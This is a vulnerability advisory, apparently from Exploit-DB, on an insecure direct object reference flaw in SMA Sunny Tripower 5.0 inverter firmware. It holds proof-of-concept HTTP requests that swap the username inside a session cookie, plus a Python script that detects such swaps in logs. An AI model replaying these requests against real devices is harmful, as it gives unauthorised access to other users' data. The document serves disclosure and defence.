Vendor: SUNNY TRIPOWER 5.0
By: Momen Eldawakhly (Cyber Guy)
CVSS: 8.1 (HIGH)
Vulnerability: Insecure Direct Object Reference (IDOR)
CWE: 639
Product Name: SUNNY TRIPOWER 5.0
Affected Version From: 3.10.16.R
Affected Version To: 3.10.16.R
Patch Exists: YES
Related CVE: CVE-2021-46416
CPE: a:sma_solar_technology:sunny_tripower_5.0
Platforms Tested: Linux [Firefox]
Year: 2022

SAM SUNNY TRIPOWER 5.0 – Insecure Direct Object Reference (IDOR)

An Insecure Direct Object Reference (IDOR) vulnerability exists in SAM SUNNY TRIPOWER 5.0 firmware version 3.10.16.R. It allows an attacker to access unauthorized data by manipulating the username parameter in the request. In the proof of concept below, that parameter is the username field inside the URL-encoded JSON of the user443 cookie, which is changed while the session ID (sid) stays the same.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to update the firmware to the latest version.

Exploit-DB raw data:

# Exploit Title: SAM SUNNY TRIPOWER 5.0 - Insecure Direct Object Reference (IDOR)
# Date: 7/4/2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://www.sma.de
# Version: SUNNY TRIPOWER 5.0 Firmware version 3.10.16.R
# Tested on: Linux [Firefox]
# CVE : CVE-2021-46416

# Proof of Concept

============[ Normal user request ]============

GET / HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A861%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
Upgrade-Insecure-Requests: 1

============[ Manipulated username request ]============

GET / HTTP/1.1
Host: 192.168.1.4
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A850%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D
Upgrade-Insecure-Requests: 1
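
A detection sketch for the pattern shown in the two requests above, added here as an example and not part of the original exploit entry: it decodes the user443 cookie from logged Cookie headers and flags any session ID (sid) that shows up with more than one username. The log tuple layout, the client address and the function names are assumptions; the cookie values are the two from the proof of concept.

```python
import json
from urllib.parse import unquote

# Cookie header from the proof of concept, with the username left as a slot.
COOKIE = ("tmhDynamicLocale.locale=%22en-us%22; user443=%7B%22role%22%3A%7B%22bitMask%22%3A2"
          "%2C%22title%22%3A%22usr%22%2C%22loginLevel%22%3A2%7D%2C%22username%22%3A{user}"
          "%2C%22sid%22%3A%22CDQMoPK0y6Q0-NaD%22%7D")

# Constructed sample: (client address, Cookie header) pairs as a reverse proxy
# or WAF in front of the device might log them. The address is made up.
SAMPLE_LOG = [
    ("192.168.1.20", COOKIE.format(user=861)),  # normal user request
    ("192.168.1.20", COOKIE.format(user=850)),  # same sid, different username
]

def parse_user_cookie(header, name="user443"):
    """Return the JSON object carried in the named cookie, or None."""
    for part in header.split(";"):
        key, _, value = part.strip().partition("=")
        if key != name:
            continue
        try:
            data = json.loads(unquote(value))
        except ValueError:  # not valid JSON after URL-decoding
            return None
        return data if isinstance(data, dict) else None
    return None

def find_identity_changes(entries):
    """Flag requests where a known sid arrives with a different username."""
    first_seen = {}  # sid -> username first observed with that sid
    alerts = []
    for client, header in entries:
        data = parse_user_cookie(header)
        if not data or not isinstance(data.get("sid"), str):
            continue
        sid, user = data["sid"], data.get("username")
        expected = first_seen.setdefault(sid, user)
        if user != expected:
            alerts.append({"client": client, "sid": sid,
                           "expected": expected, "seen": user})
    return alerts

if __name__ == "__main__":
    for alert in find_identity_changes(SAMPLE_LOG):
        print("username changed within one session:", alert)
```
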